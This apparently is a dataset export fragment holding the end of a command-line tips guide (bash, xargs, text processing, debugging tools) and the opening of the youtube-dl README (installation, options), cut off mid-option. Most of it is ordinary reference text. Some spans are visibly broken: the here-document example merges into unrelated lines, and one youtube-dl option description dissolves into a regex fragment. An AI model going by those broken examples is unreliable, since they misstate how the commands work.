You can then return to it later via command history.\n\n- Use `xargs` (or `parallel`). It's very powerful. Note you can control how many items execute per line (`-L`) as well as parallelism (`-P`). If you're not sure if it'll do the right thing, use `xargs echo` first. Also, `-I{}` is handy. Examples:\n```bash\n find . -name '*.py' | xargs grep some_function\n cat hosts | xargs -I{} ssh root@{} hostname\n```\n\n- `pstree -p` is a helpful display of the process tree.\n\n- Use `pgrep` and `pkill` to find or signal processes by name (`-f` is helpful).\n\n- Know the various signals you can send processes. For example, to suspend a process, use `kill -STOP [pid]`. For the full list, see `man 7 signal`\n\n- Use `nohup` or `disown` if you want a background process to keep running forever.\n\n- Check what processes are listening via `netstat -lntp` or `ss -plat` (for TCP; add `-u` for UDP) or `lsof -iTCP -sTCP:LISTEN -P -n` (which also works on macOS).\n\n- See also `lsof` and `fuser` for open sockets and files.\n\n- See `uptime` or `w` to know how long the system has been running.\n\n- Use `alias` to create shortcuts for commonly used commands. For example, `alias ll='ls -latr'` creates a new alias `ll`.\n\n- Save aliases, shell settings, and functions you commonly use in `~/.bashrc`, and [arrange for login shells to source it](http://superuser.com/a/183980/7106). This will make your setup available in all your shell sessions.\n\n- Put the settings of environment variables as well as commands that should be executed when you login in `~/.bash_profile`. Separate configuration will be needed for shells you launch from graphical environment logins and `cron` jobs.\n\n- Synchronize your configuration files (e.g. `.bashrc` and `.bash_profile`) among various computers with Git.\n\n- Understand that care is needed when variables and filenames include whitespace. Surround your Bash variables with quotes, e.g. `\"$FOO\"`. Prefer the `-0` or `-print0` options to enable null characters to delimit filenames, e.g. `locate -0 pattern | xargs -0 ls -al` or `find / -print0 -type d | xargs -0 ls -al`. To iterate on filenames containing whitespace in a for loop, set your IFS to be a newline only using `IFS=$'\\n'`.\n\n- In Bash scripts, use `set -x` (or the variant `set -v`, which logs raw input, including unexpanded variables and comments) for debugging output. Use strict modes unless you have a good reason not to: Use `set -e` to abort on errors (nonzero exit code). Use `set -u` to detect unset variable usages. Consider `set -o pipefail` too, to abort on errors within pipes (though read up on it more if you do, as this topic is a bit subtle). For more involved scripts, also use `trap` on EXIT or ERR. A useful habit is to start a script like this, which will make it detect and abort on common errors and print a message:\n```bash\n set -euo pipefail\n trap \"echo 'error: Script failed: see failed command above'\" ERR\n```\n\n- In Bash scripts, subshells (written with parentheses) are convenient ways to group commands. A common example is to temporarily move to a different working directory, e.g.\n```bash\n # do something in current dir\n (cd /some/other/dir && other-command)\n # continue in original dir\n```\n\n- In Bash, note there are lots of kinds of variable expansion. Checking a variable exists: `${name:?error message}`. For example, if a Bash script requires a single argument, just write `input_file=${1:?usage: $0 input_file}`. Using a default value if a variable is empty: `${name:-default}`. If you want to have an additional (optional) parameter added to the previous example, you can use something like `output_file=${2:-logfile}`. If `$2` is omitted and thus empty, `output_file` will be set to `logfile`. Arithmetic expansion: `i=$(( (i + 1) % 5 ))`. Sequences: `{1..10}`. Trimming of strings: `${var%suffix}` and `${var#prefix}`. For example if `var=foo.pdf`, then `echo ${var%.pdf}.txt` prints `foo.txt`.\n\n- Brace expansion using `{`...`}` can reduce having to re-type similar text and automate combinations of items. This is helpful in examples like `mv foo.{txt,pdf} some-dir` (which moves both files), `cp somefile{,.bak}` (which expands to `cp somefile somefile.bak`) or `mkdir -p test-{a,b,c}/subtest-{1,2,3}` (which expands all possible combinations and creates a directory tree). Brace expansion is performed before any other expansion.\n\n- The order of expansions is: brace expansion; tilde expansion, parameter and variable expansion, arithmetic expansion, and command substitution (done in a left-to-right fashion); word splitting; and filename expansion. (For example, a range like `{1..20}` cannot be expressed with variables using `{$a..$b}`. Use `seq` or a `for` loop instead, e.g., `seq $a $b` or `for((i=a; i<=b; i++)); do ... ; done`.)\n\n- The output of a command can be treated like a file via `<(some command)` (known as process substitution). For example, compare local `/etc/hosts` with a remote one:\n```sh\n diff /etc/hosts <(ssh somehost cat /etc/hosts)\n```\n\n- When writing scripts you may want to put all of your code in curly braces. If the closing brace is missing, your script will be prevented from executing due to a syntax error. This makes sense when your script is going to be downloaded from the web, since it prevents partially downloaded scripts from executing:\n```bash\n{\n # Your code here\n}\n```\n\n- A \"here document\" allows [redirection of multiple lines of input](https://www.tldp.org/LDP/abs/html/here-docs.html) as if from a file:\n```\ncat <logfile 2>&1` or `some-command &>logfile`. Often, to ensure a command does not leave an open file handle to standard input, tying it to the terminal you are in, it is also good practice to add `>> 2+3\n5\n```\n\n\n## Processing files and data\n\n- To locate a file by name in the current directory, `find . -iname '*something*'` (or similar). To find a file anywhere by name, use `locate something` (but bear in mind `updatedb` may not have indexed recently created files).\n\n- For general searching through source or data files, there are several options more advanced or faster than `grep -r`, including (in rough order from older to newer) [`ack`](https://github.com/beyondgrep/ack2), [`ag`](https://github.com/ggreer/the_silver_searcher) (\"the silver searcher\"), and [`rg`](https://github.com/BurntSushi/ripgrep) (ripgrep).\n\n- To convert HTML to text: `lynx -dump -stdin`\n\n- For Markdown, HTML, and all kinds of document conversion, try [`pandoc`](http://pandoc.org/). For example, to convert a Markdown document to Word format: `pandoc README.md --from markdown --to docx -o temp.docx`\n\n- If you must handle XML, `xmlstarlet` is old but good.\n\n- For JSON, use [`jq`](http://stedolan.github.io/jq/). For interactive use, also see [`jid`](https://github.com/simeji/jid) and [`jiq`](https://github.com/fiatjaf/jiq).\n\n- For YAML, use [`shyaml`](https://github.com/0k/shyaml).\n\n- For Excel or CSV files, [csvkit](https://github.com/onyxfish/csvkit) provides `in2csv`, `csvcut`, `csvjoin`, `csvgrep`, etc.\n\n- For Amazon S3, [`s3cmd`](https://github.com/s3tools/s3cmd) is convenient and [`s4cmd`](https://github.com/bloomreach/s4cmd) is faster. Amazon's [`aws`](https://github.com/aws/aws-cli) and the improved [`saws`](https://github.com/donnemartin/saws) are essential for other AWS-related tasks.\n\n- Know about `sort` and `uniq`, including uniq's `-u` and `-d` options -- see one-liners below. See also `comm`.\n\n- Know about `cut`, `paste`, and `join` to manipulate text files. Many people use `cut` but forget about `join`.\n\n- Know about `wc` to count newlines (`-l`), characters (`-m`), words (`-w`) and bytes (`-c`).\n\n- Know about `tee` to copy from stdin to a file and also to stdout, as in `ls -al | tee file.txt`.\n\n- For more complex calculations, including grouping, reversing fields, and statistical calculations, consider [`datamash`](https://www.gnu.org/software/datamash/).\n\n- Know that locale affects a lot of command line tools in subtle ways, including sorting order (collation) and performance. Most Linux installations will set `LANG` or other locale variables to a local setting like US English. But be aware sorting will change if you change locale. And know i18n routines can make sort or other commands run *many times* slower. In some situations (such as the set operations or uniqueness operations below) you can safely ignore slow i18n routines entirely and use traditional byte-based sort order, using `export LC_ALL=C`.\n\n- You can set a specific command's environment by prefixing its invocation with the environment variable settings, as in `TZ=Pacific/Fiji date`.\n\n- Know basic `awk` and `sed` for simple data munging. See [One-liners](#one-liners) for examples.\n\n- To replace all occurrences of a string in place, in one or more files:\n```sh\n perl -pi.bak -e 's/old-string/new-string/g' my-files-*.txt\n```\n\n- To rename multiple files and/or search and replace within files, try [`repren`](https://github.com/jlevy/repren). (In some cases the `rename` command also allows multiple renames, but be careful as its functionality is not the same on all Linux distributions.)\n```sh\n # Full rename of filenames, directories, and contents foo -> bar:\n repren --full --preserve-case --from foo --to bar .\n # Recover backup files whatever.bak -> whatever:\n repren --renames --from '(.*)\\.bak' --to '\\1' *.bak\n # Same as above, using rename, if available:\n rename 's/\\.bak$//' *.bak\n```\n\n- As the man page says, `rsync` really is a fast and extraordinarily versatile file copying tool. It's known for synchronizing between machines but is equally useful locally. When security restrictions allow, using `rsync` instead of `scp` allows recovery of a transfer without restarting from scratch. It also is among the [fastest ways](https://web.archive.org/web/20130929001850/http://linuxnote.net/jianingy/en/linux/a-fast-way-to-remove-huge-number-of-files.html) to delete large numbers of files:\n```sh\nmkdir empty && rsync -r --delete empty/ some-dir && rmdir some-dir\n```\n\n- For monitoring progress when processing files, use [`pv`](http://www.ivarch.com/programs/pv.shtml), [`pycp`](https://github.com/dmerejkowsky/pycp), [`pmonitor`](https://github.com/dspinellis/pmonitor), [`progress`](https://github.com/Xfennec/progress), `rsync --progress`, or, for block-level copying, `dd status=progress`.\n\n- Use `shuf` to shuffle or select random lines from a file.\n\n- Know `sort`'s options. For numbers, use `-n`, or `-h` for handling human-readable numbers (e.g. from `du -h`). Know how keys work (`-t` and `-k`). In particular, watch out that you need to write `-k1,1` to sort by only the first field; `-k1` means sort according to the whole line. Stable sort (`sort -s`) can be useful. For example, to sort first by field 2, then secondarily by field 1, you can use `sort -k1,1 | sort -s -k2,2`.\n\n- If you ever need to write a tab literal in a command line in Bash (e.g. for the -t argument to sort), press **ctrl-v** **[Tab]** or write `$'\\t'` (the latter is better as you can copy/paste it).\n\n- The standard tools for patching source code are `diff` and `patch`. See also `diffstat` for summary statistics of a diff and `sdiff` for a side-by-side diff. Note `diff -r` works for entire directories. Use `diff -r tree1 tree2 | diffstat` for a summary of changes. Use `vimdiff` to compare and edit files.\n\n- For binary files, use `hd`, `hexdump` or `xxd` for simple hex dumps and `bvi`, `hexedit` or `biew` for binary editing.\n\n- Also for binary files, `strings` (plus `grep`, etc.) lets you find bits of text.\n\n- For binary diffs (delta compression), use `xdelta3`.\n\n- To convert text encodings, try `iconv`. Or `uconv` for more advanced use; it supports some advanced Unicode things. For example:\n```sh\n # Displays hex codes or actual names of characters (useful for debugging):\n uconv -f utf-8 -t utf-8 -x '::Any-Hex;' < input.txt\n uconv -f utf-8 -t utf-8 -x '::Any-Name;' < input.txt\n # Lowercase and removes all accents (by expanding and dropping them):\n uconv -f utf-8 -t utf-8 -x '::Any-Lower; ::Any-NFD; [:Nonspacing Mark:] >; ::Any-NFC;' < input.txt > output.txt\n```\n\n- To split files into pieces, see `split` (to split by size) and `csplit` (to split by a pattern).\n\n- Date and time: To get the current date and time in the helpful [ISO 8601](https://en.wikipedia.org/wiki/ISO_8601) format, use `date -u +\"%Y-%m-%dT%H:%M:%SZ\"` (other options [are](https://stackoverflow.com/questions/7216358/date-command-on-os-x-doesnt-have-iso-8601-i-option) [problematic](https://unix.stackexchange.com/questions/164826/date-command-iso-8601-option)). To manipulate date and time expressions, use `dateadd`, `datediff`, `strptime` etc. from [`dateutils`](http://www.fresse.org/dateutils/).\n\n- Use `zless`, `zmore`, `zcat`, and `zgrep` to operate on compressed files.\n\n- File attributes are settable via `chattr` and offer a lower-level alternative to file permissions. For example, to protect against accidental file deletion the immutable flag: `sudo chattr +i /critical/directory/or/file`\n\n- Use `getfacl` and `setfacl` to save and restore file permissions. For example:\n```sh\n getfacl -R /some/path > permissions.txt\n setfacl --restore=permissions.txt\n```\n\n- To create empty files quickly, use `truncate` (creates [sparse file](https://en.wikipedia.org/wiki/Sparse_file)), `fallocate` (ext4, xfs, btrfs and ocfs2 filesystems), `xfs_mkfile` (almost any filesystems, comes in xfsprogs package), `mkfile` (for Unix-like systems like Solaris, Mac OS).\n\n## System debugging\n\n- For web debugging, `curl` and `curl -I` are handy, or their `wget` equivalents, or the more modern [`httpie`](https://github.com/jkbrzt/httpie).\n\n- To know current cpu/disk status, the classic tools are `top` (or the better `htop`), `iostat`, and `iotop`. Use `iostat -mxz 15` for basic CPU and detailed per-partition disk stats and performance insight.\n\n- For network connection details, use `netstat` and `ss`.\n\n- For a quick overview of what's happening on a system, `dstat` is especially useful. For broadest overview with details, use [`glances`](https://github.com/nicolargo/glances).\n\n- To know memory status, run and understand the output of `free` and `vmstat`. In particular, be aware the \"cached\" value is memory held by the Linux kernel as file cache, so effectively counts toward the \"free\" value.\n\n- Java system debugging is a different kettle of fish, but a simple trick on Oracle's and some other JVMs is that you can run `kill -3 ` and a full stack trace and heap summary (including generational garbage collection details, which can be highly informative) will be dumped to stderr/logs. The JDK's `jps`, `jstat`, `jstack`, `jmap` are useful. [SJK tools](https://github.com/aragozin/jvm-tools) are more advanced.\n\n- Use [`mtr`](http://www.bitwizard.nl/mtr/) as a better traceroute, to identify network issues.\n\n- For looking at why a disk is full, [`ncdu`](https://dev.yorhel.nl/ncdu) saves time over the usual commands like `du -sh *`.\n\n- To find which socket or process is using bandwidth, try [`iftop`](http://www.ex-parrot.com/~pdw/iftop/) or [`nethogs`](https://github.com/raboof/nethogs).\n\n- The `ab` tool (comes with Apache) is helpful for quick-and-dirty checking of web server performance. For more complex load testing, try `siege`.\n\n- For more serious network debugging, [`wireshark`](https://wireshark.org/), [`tshark`](https://www.wireshark.org/docs/wsug_html_chunked/AppToolstshark.html), or [`ngrep`](http://ngrep.sourceforge.net/).\n\n- Know about `strace` and `ltrace`. These can be helpful if a program is failing, hanging, or crashing, and you don't know why, or if you want to get a general idea of performance. Note the profiling option (`-c`), and the ability to attach to a running process (`-p`). Use trace child option (`-f`) to avoid missing important calls.\n\n- Know about `ldd` to check shared libraries etc — but [never run it on untrusted files](http://www.catonmat.net/blog/ldd-arbitrary-code-execution/).\n\n- Know how to connect to a running process with `gdb` and get its stack traces.\n\n- Use `/proc`. It's amazingly helpful sometimes when debugging live problems. Examples: `/proc/cpuinfo`, `/proc/meminfo`, `/proc/cmdline`, `/proc/xxx/cwd`, `/proc/xxx/exe`, `/proc/xxx/fd/`, `/proc/xxx/smaps` (where `xxx` is the process id or pid).\n\n- When debugging why something went wrong in the past, [`sar`](http://sebastien.godard.pagesperso-orange.fr/) can be very helpful. It shows historic statistics on CPU, memory, network, etc.\n\n- For deeper systems and performance analyses, look at `stap` ([SystemTap](https://sourceware.org/systemtap/wiki)), [`perf`](https://en.wikipedia.org/wiki/Perf_%28Linux%29), and [`sysdig`](https://github.com/draios/sysdig).\n\n- Check what OS you're on with `uname` or `uname -a` (general Unix/kernel info) or `lsb_release -a` (Linux distro info).\n\n- Use `dmesg` whenever something's acting really funny (it could be hardware or driver issues).\n\n- If you delete a file and it doesn't free up expected disk space as reported by `du`, check whether the file is in use by a process:\n`lsof | grep deleted | grep \"filename-of-my-big-file\"`\n\n\n## One-liners\n\nA few examples of piecing together commands:\n\n- It is remarkably helpful sometimes that you can do set intersection, union, and difference of text files via `sort`/`uniq`. Suppose `a` and `b` are text files that are already uniqued. This is fast, and works on files of arbitrary size, up to many gigabytes. (Sort is not limited by memory, though you may need to use the `-T` option if `/tmp` is on a small root partition.) See also the note about `LC_ALL` above and `sort`'s `-u` option (left out for clarity below).\n```sh\n sort a b | uniq > c # c is a union b\n sort a b | uniq -d > c # c is a intersect b\n sort a b b | uniq -u > c # c is set difference a - b\n```\n\n- Pretty-print two JSON files, normalizing their syntax, then coloring and paginating the result:\n```\n diff <(jq --sort-keys . < file1.json) <(jq --sort-keys . < file2.json) | colordiff | less -R\n```\n\n- Use `grep . *` to quickly examine the contents of all files in a directory (so each line is paired with the filename), or `head -100 *` (so each file has a heading). This can be useful for directories filled with config settings like those in `/sys`, `/proc`, `/etc`.\n\n\n- Summing all numbers in the third column of a text file (this is probably 3X faster and 3X less code than equivalent Python):\n```sh\n awk '{ x += $3 } END { print x }' myfile\n```\n\n- To see sizes/dates on a tree of files, this is like a recursive `ls -l` but is easier to read than `ls -lR`:\n```sh\n find . -type f -ls\n```\n\n- Say you have a text file, like a web server log, and a certain value that appears on some lines, such as an `acct_id` parameter that is present in the URL. If you want a tally of how many requests for each `acct_id`:\n```sh\n egrep -o 'acct_id=[0-9]+' access.log | cut -d= -f2 | sort | uniq -c | sort -rn\n```\n\n- To continuously monitor changes, use `watch`, e.g. check changes to files in a directory with `watch -d -n 2 'ls -rtlh | tail'` or to network settings while troubleshooting your wifi settings with `watch -d -n 2 ifconfig`.\n\n- Run this function to get a random tip from this document (parses Markdown and extracts an item):\n```sh\n function taocl() {\n curl -s https://raw.githubusercontent.com/jlevy/the-art-of-command-line/master/README.md |\n sed '/cowsay[.]png/d' |\n pandoc -f markdown -t html |\n xmlstarlet fo --html --dropdtd |\n xmlstarlet sel -t -v \"(html/body/ul/li[count(p)>0])[$RANDOM mod last()+1]\" |\n xmlstarlet unesc | fmt -80 | iconv -t US\n }\n```\n\n\n## Obscure but useful\n\n- `expr`: perform arithmetic or boolean operations or evaluate regular expressions\n\n- `m4`: simple macro processor\n\n- `yes`: print a string a lot\n\n- `cal`: nice calendar\n\n- `env`: run a command (useful in scripts)\n\n- `printenv`: print out environment variables (useful in debugging and scripts)\n\n- `look`: find English words (or lines in a file) beginning with a string\n\n- `cut`, `paste` and `join`: data manipulation\n\n- `fmt`: format text paragraphs\n\n- `pr`: format text into pages/columns\n\n- `fold`: wrap lines of text\n\n- `column`: format text fields into aligned, fixed-width columns or tables\n\n- `expand` and `unexpand`: convert between tabs and spaces\n\n- `nl`: add line numbers\n\n- `seq`: print numbers\n\n- `bc`: calculator\n\n- `factor`: factor integers\n\n- [`gpg`](https://gnupg.org/): encrypt and sign files\n\n- `toe`: table of terminfo entries\n\n- `nc`: network debugging and data transfer\n\n- `socat`: socket relay and tcp port forwarder (similar to `netcat`)\n\n- [`slurm`](https://github.com/mattthias/slurm): network traffic visualization\n\n- `dd`: moving data between files or devices\n\n- `file`: identify type of a file\n\n- `tree`: display directories and subdirectories as a nesting tree; like `ls` but recursive\n\n- `stat`: file info\n\n- `time`: execute and time a command\n\n- `timeout`: execute a command for specified amount of time and stop the process when the specified amount of time completes.\n\n- `lockfile`: create semaphore file that can only be removed by `rm -f`\n\n- `logrotate`: rotate, compress and mail logs.\n\n- `watch`: run a command repeatedly, showing results and/or highlighting changes\n\n- [`when-changed`](https://github.com/joh/when-changed): runs any command you specify whenever it sees file changed. See `inotifywait` and `entr` as well.\n\n- `tac`: print files in reverse\n\n- `comm`: compare sorted files line by line\n\n- `strings`: extract text from binary files\n\n- `tr`: character translation or manipulation\n\n- `iconv` or `uconv`: conversion for text encodings\n\n- `split` and `csplit`: splitting files\n\n- `sponge`: read all input before writing it, useful for reading from then writing to the same file, e.g., `grep -v something some-file | sponge some-file`\n\n- `units`: unit conversions and calculations; converts furlongs per fortnight to twips per blink (see also `/usr/share/units/definitions.units`)\n\n- `apg`: generates random passwords\n\n- `xz`: high-ratio file compression\n\n- `ldd`: dynamic library info\n\n- `nm`: symbols from object files\n\n- `ab` or [`wrk`](https://github.com/wg/wrk): benchmarking web servers\n\n- `strace`: system call debugging\n\n- [`mtr`](http://www.bitwizard.nl/mtr/): better traceroute for network debugging\n\n- `cssh`: visual concurrent shell\n\n- `rsync`: sync files and folders over SSH or in local file system\n\n- [`wireshark`](https://wireshark.org/) and [`tshark`](https://www.wireshark.org/docs/wsug_html_chunked/AppToolstshark.html): packet capture and network debugging\n\n- [`ngrep`](http://ngrep.sourceforge.net/): grep for the network layer\n\n- `host` and `dig`: DNS lookups\n\n- `lsof`: process file descriptor and socket info\n\n- `dstat`: useful system stats\n\n- [`glances`](https://github.com/nicolargo/glances): high level, multi-subsystem overview\n\n- `iostat`: Disk usage stats\n\n- `mpstat`: CPU usage stats\n\n- `vmstat`: Memory usage stats\n\n- `htop`: improved version of top\n\n- `last`: login history\n\n- `w`: who's logged on\n\n- `id`: user/group identity info\n\n- [`sar`](http://sebastien.godard.pagesperso-orange.fr/): historic system stats\n\n- [`iftop`](http://www.ex-parrot.com/~pdw/iftop/) or [`nethogs`](https://github.com/raboof/nethogs): network utilization by socket or process\n\n- `ss`: socket statistics\n\n- `dmesg`: boot and system error messages\n\n- `sysctl`: view and configure Linux kernel parameters at run time\n\n- `hdparm`: SATA/ATA disk manipulation/performance\n\n- `lsblk`: list block devices: a tree view of your disks and disk partitions\n\n- `lshw`, `lscpu`, `lspci`, `lsusb`, `dmidecode`: hardware information, including CPU, BIOS, RAID, graphics, devices, etc.\n\n- `lsmod` and `modinfo`: List and show details of kernel modules.\n\n- `fortune`, `ddate`, and `sl`: um, well, it depends on whether you consider steam locomotives and Zippy quotations \"useful\"\n\n\n## macOS only\n\nThese are items relevant *only* on macOS.\n\n- Package management with `brew` (Homebrew) and/or `port` (MacPorts). These can be used to install on macOS many of the above commands.\n\n- Copy output of any command to a desktop app with `pbcopy` and paste input from one with `pbpaste`.\n\n- To enable the Option key in macOS Terminal as an alt key (such as used in the commands above like **alt-b**, **alt-f**, etc.), open Preferences -> Profiles -> Keyboard and select \"Use Option as Meta key\".\n\n- To open a file with a desktop app, use `open` or `open -a /Applications/Whatever.app`.\n\n- Spotlight: Search files with `mdfind` and list metadata (such as photo EXIF info) with `mdls`.\n\n- Be aware macOS is based on BSD Unix, and many commands (for example `ps`, `ls`, `tail`, `awk`, `sed`) have many subtle variations from Linux, which is largely influenced by System V-style Unix and GNU tools. You can often tell the difference by noting a man page has the heading \"BSD General Commands Manual.\" In some cases GNU versions can be installed, too (such as `gawk` and `gsed` for GNU awk and sed). If writing cross-platform Bash scripts, avoid such commands (for example, consider Python or `perl`) or test carefully.\n\n- To get macOS release information, use `sw_vers`.\n\n## Windows only\n\nThese items are relevant *only* on Windows.\n\n### Ways to obtain Unix tools under Windows\n\n- Access the power of the Unix shell under Microsoft Windows by installing [Cygwin](https://cygwin.com/). Most of the things described in this document will work out of the box.\n\n- On Windows 10, you can use [Windows Subsystem for Linux (WSL)](https://msdn.microsoft.com/commandline/wsl/about), which provides a familiar Bash environment with Unix command line utilities.\n\n- If you mainly want to use GNU developer tools (such as GCC) on Windows, consider [MinGW](http://www.mingw.org/) and its [MSYS](http://www.mingw.org/wiki/msys) package, which provides utilities such as bash, gawk, make and grep. MSYS doesn't have all the features compared to Cygwin. MinGW is particularly useful for creating native Windows ports of Unix tools.\n\n- Another option to get Unix look and feel under Windows is [Cash](https://github.com/dthree/cash). Note that only very few Unix commands and command-line options are available in this environment.\n\n### Useful Windows command-line tools\n\n- You can perform and script most Windows system administration tasks from the command line by learning and using `wmic`.\n\n- Native command-line Windows networking tools you may find useful include `ping`, `ipconfig`, `tracert`, and `netstat`.\n\n- You can perform [many useful Windows tasks](http://www.thewindowsclub.com/rundll32-shortcut-commands-windows) by invoking the `Rundll32` command.\n\n### Cygwin tips and tricks\n\n- Install additional Unix programs with the Cygwin's package manager.\n\n- Use `mintty` as your command-line window.\n\n- Access the Windows clipboard through `/dev/clipboard`.\n\n- Run `cygstart` to open an arbitrary file through its registered application.\n\n- Access the Windows registry with `regtool`.\n\n- Note that a `C:\\` Windows drive path becomes `/cygdrive/c` under Cygwin, and that Cygwin's `/` appears under `C:\\cygwin` on Windows. Convert between Cygwin and Windows-style file paths with `cygpath`. This is most useful in scripts that invoke Windows programs.\n\n## More resources\n\n- [awesome-shell](https://github.com/alebcay/awesome-shell): A curated list of shell tools and resources.\n- [awesome-osx-command-line](https://github.com/herrbischoff/awesome-osx-command-line): A more in-depth guide for the macOS command line.\n- [Strict mode](http://redsymbol.net/articles/unofficial-bash-strict-mode/) for writing better shell scripts.\n- [shellcheck](https://github.com/koalaman/shellcheck): A shell script static analysis tool. Essentially, lint for bash/sh/zsh.\n- [Filenames and Pathnames in Shell](http://www.dwheeler.com/essays/filenames-in-shell.html): The sadly complex minutiae on how to handle filenames correctly in shell scripts.\n- [Data Science at the Command Line](http://datascienceatthecommandline.com/#tools): More commands and tools helpful for doing data science, from the book of the same name\n\n## Disclaimer\n\nWith the exception of very small tasks, code is written so others can read it. With power comes responsibility. The fact you *can* do something in Bash doesn't necessarily mean you should! ;)\n\n\n## License\n\n[![Creative Commons License](https://i.creativecommons.org/l/by-sa/4.0/88x31.png)](http://creativecommons.org/licenses/by-sa/4.0/)\n\nThis work is licensed under a [Creative Commons Attribution-ShareAlike 4.0 International License](http://creativecommons.org/licenses/by-sa/4.0/).\n"}}},{"rowIdx":681,"cells":{"text":{"kind":"string","value":"[![Build Status](https://github.com/ytdl-org/youtube-dl/workflows/CI/badge.svg)](https://github.com/ytdl-org/youtube-dl/actions?query=workflow%3ACI)\n\n\nyoutube-dl - download videos from youtube.com or other video platforms\n\n- [INSTALLATION](#installation)\n- [DESCRIPTION](#description)\n- [OPTIONS](#options)\n- [CONFIGURATION](#configuration)\n- [OUTPUT TEMPLATE](#output-template)\n- [FORMAT SELECTION](#format-selection)\n- [VIDEO SELECTION](#video-selection)\n- [FAQ](#faq)\n- [DEVELOPER INSTRUCTIONS](#developer-instructions)\n- [EMBEDDING YOUTUBE-DL](#embedding-youtube-dl)\n- [BUGS](#bugs)\n- [COPYRIGHT](#copyright)\n\n# INSTALLATION\n\nTo install it right away for all UNIX users (Linux, macOS, etc.), type:\n\n sudo curl -L https://yt-dl.org/downloads/latest/youtube-dl -o /usr/local/bin/youtube-dl\n sudo chmod a+rx /usr/local/bin/youtube-dl\n\nIf you do not have curl, you can alternatively use a recent wget:\n\n sudo wget https://yt-dl.org/downloads/latest/youtube-dl -O /usr/local/bin/youtube-dl\n sudo chmod a+rx /usr/local/bin/youtube-dl\n\nWindows users can [download an .exe file](https://yt-dl.org/latest/youtube-dl.exe) and place it in any location on their [PATH](https://en.wikipedia.org/wiki/PATH_%28variable%29) except for `%SYSTEMROOT%\\System32` (e.g. **do not** put in `C:\\Windows\\System32`).\n\nYou can also use pip:\n\n sudo -H pip install --upgrade youtube-dl\n \nThis command will update youtube-dl if you have already installed it. See the [pypi page](https://pypi.python.org/pypi/youtube_dl) for more information.\n\nmacOS users can install youtube-dl with [Homebrew](https://brew.sh/):\n\n brew install youtube-dl\n\nOr with [MacPorts](https://www.macports.org/):\n\n sudo port install youtube-dl\n\nAlternatively, refer to the [developer instructions](#developer-instructions) for how to check out and work with the git repository. For further options, including PGP signatures, see the [youtube-dl Download Page](https://ytdl-org.github.io/youtube-dl/download.html).\n\n# DESCRIPTION\n**youtube-dl** is a command-line program to download videos from YouTube.com and a few more sites. It requires the Python interpreter, version 2.6, 2.7, or 3.2+, and it is not platform specific. It should work on your Unix box, on Windows or on macOS. It is released to the public domain, which means you can modify it, redistribute it or use it however you like.\n\n youtube-dl [OPTIONS] URL [URL...]\n\n# OPTIONS\n -h, --help Print this help text and exit\n --version Print program version and exit\n -U, --update Update this program to latest version. Make\n sure that you have sufficient permissions\n (run with sudo if needed)\n -i, --ignore-errors Continue on download errors, for example to\n skip unavailable videos in a playlist\n --abort-on-error Abort downloading of further videos (in the\n playlist or the command line) if an error\n occurs\n --dump-user-agent Display the current browser identification\n --list-extractors List all supported extractors\n --extractor-descriptions Output descriptions of all supported\n extractors\n --force-generic-extractor Force extraction to use the generic\n extractor\n --default-search PREFIX Use this prefix for unqualified URLs. For\n example \"gvsearch2:\" downloads two videos\n from google videos for youtube-dl \"large\n apple\". Use the value \"auto\" to let\n youtube-dl guess (\"auto_warning\" to emit a\n warning when guessing). \"error\" just throws\n an error. The default value \"fixup_error\"\n repairs broken URLs, but emits an error if\n this is not possible instead of searching.\n --ignore-config Do not read configuration files. When given\n in the global configuration file\n /etc/youtube-dl.conf: Do not read the user\n configuration in ~/.config/youtube-\n dl/config (%APPDATA%/youtube-dl/config.txt\n on Windows)\n --config-location PATH Location of the configuration file; either\n the path to the config or its containing\n directory.\n --flat-playlist Do not extract the videos of a playlist,\n only list them.\n --mark-watched Mark videos watched (YouTube only)\n --no-mark-watched Do not mark videos watched (YouTube only)\n --no-color Do not emit color codes in output\n\n## Network Options:\n --proxy URL Use the specified HTTP/HTTPS/SOCKS proxy.\n To enable SOCKS proxy, specify a proper\n scheme. For example\n socks5://127.0.0.1:1080/. Pass in an empty\n string (--proxy \"\") for direct connection\n --socket-timeout SECONDS Time to wait before giving up, in seconds\n --source-address IP Client-side IP address to bind to\n -4, --force-ipv4 Make all connections via IPv4\n -6, --force-ipv6 Make all connections via IPv6\n\n## Geo Restriction:\n --geo-verification-proxy URL Use this proxy to verify the IP address for\n some geo-restricted sites. The default\n proxy specified by --proxy (or none, if the\n option is not present) is used for the\n actual downloading.\n --geo-bypass Bypass geographic restriction via faking\n X-Forwarded-For HTTP header\n --no-geo-bypass Do not bypass geographic restriction via\n faking X-Forwarded-For HTTP header\n --geo-bypass-country CODE Force bypass geographic restriction with\n explicitly provided two-letter ISO 3166-2\n country code\n --geo-bypass-ip-block IP_BLOCK Force bypass geographic restriction with\n explicitly provided IP block in CIDR\n notation\n\n## Video Selection:\n --playlist-start NUMBER Playlist video to start at (default is 1)\n --playlist-end NUMBER Playlist video to end at (default is last)\n --playlist-items ITEM_SPEC Playlist video items to download. Specify\n indices of the videos in the playlist\n separated by commas like: \"--playlist-items\n 1,2,5,8\" if you want to download videos\n indexed 1, 2, 5, 8 in the playlist. You can\n specify range: \"--playlist-items\n 1-3,7,10-13\", it will download the videos\n at index 1, 2, 3, 7, 10, 11, 12 and 13.\n --match-title REGEX Download only matching titles (regex or\n caseless sub-string)\n --reject-title REGEX Skip download for matching titles (regex or\n caseless sub-string)\n --max-downloads NUMBER Abort after downloading NUMBER files\n --min-filesize SIZE Do not download any videos smaller than\n SIZE (e.g. 50k or 44.6m)\n --max-filesize SIZE Do not download any videos larger than SIZE\n (e.g. 50k or 44.6m)\n --date DATE Download only videos uploaded in this date\n --datebefore DATE Download only videos uploaded on or before\n this date (i.e. inclusive)\n --dateafter DATE Download only videos uploaded on or after\n this date (i.e. inclusive)\n --min-views COUNT Do not download any videos with less than\n COUNT views\n --max-views COUNT Do not download any videos with more than\n COUNT views\n --match-filter FILTER Generic video filter. Specify any key (see\n the \"OUTPUT TEMPLATE\" for a list of\n available keys) to match if the key is\n present, !key to check if the key is not\n present, key > NUMBER (like \"comment_count\n > 12\", also works with >=, <, <=, !=, =) to\n compare against a number, key = 'LITERAL'\n (like \"uploader = 'Mike Smith'\", also works\n with !=) to match against a string literal\n and & to require multiple matches. Values\n which are not known are excluded unless you\n put a question mark (?) after the operator.\n For example, to only match videos that have\n been liked more than 100 times and disliked\n less than 50 times (or the dislike\n functionality is not available at the given\n service), but who also have a description,\n use --match-filter \"like_count > 100 &\n dislike_count .+?) - (?P.+)\"\n --xattrs Write metadata to the video file's xattrs\n (using dublin core and xdg standards)\n --fixup POLICY Automatically correct known faults of the\n file. One 